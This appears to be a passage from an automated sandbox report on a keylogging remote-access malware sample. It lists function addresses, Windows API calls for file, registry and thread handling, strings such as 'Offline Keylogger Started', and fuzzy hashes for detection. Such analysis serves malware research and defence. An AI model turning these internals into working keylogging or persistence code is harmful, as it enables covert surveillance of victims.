                                                                                                                                                                                                  • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                                                                                                                  Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                                                                                  • String ID: xpF
                                                                                                                                                                                                  • API String ID: 1852769593-354647465
                                                                                                                                                                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                                                                                                                  Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                                                  • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                  • API String ID: 782494840-2070987746
                                                                                                                                                                                                  • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                                                                                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                                                                                                                                  Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                                  • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                  • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                                  • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                  • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                  • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                                                  Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                                  • String ID: XQG
                                                                                                                                                                                                  • API String ID: 1958988193-3606453820
                                                                                                                                                                                                  • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                                                                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                                                                                                                                  Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountEventTick
                                                                                                                                                                                                  • String ID: !D@$NG
                                                                                                                                                                                                  • API String ID: 180926312-2721294649
                                                                                                                                                                                                  • Opcode ID: 4713c36fcbac08608a4361280b7e24833d1112ad43d0243e40292e8207760e54
                                                                                                                                                                                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4713c36fcbac08608a4361280b7e24833d1112ad43d0243e40292e8207760e54
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                                                                                                                                  Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                                  • String ID: Offline Keylogger Started
                                                                                                                                                                                                  • API String ID: 465354869-4114347211
                                                                                                                                                                                                  • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                                                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                                                                                                  Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                  • API String ID: 2532271599-1507639952
                                                                                                                                                                                                  • Opcode ID: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                                                                                                                                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                                                                                                  Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                                                                                  • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                  • API String ID: 1818849710-4028850238
                                                                                                                                                                                                  • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                                                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                                                                                                                  Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3360349984-0
                                                                                                                                                                                                  • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                                                                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                                                                                                  Function 1000C7E6 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2905821283-0
                                                                                                                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                  • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                                                  Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                  • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                  • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                                                  Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                                                                                                                  Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3919263394-0
                                                                                                                                                                                                  • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                                                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                                                                                                                  Function 0044F199 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 546120528-2084328917
                                                                                                                                                                                                  • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                                                                                  • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
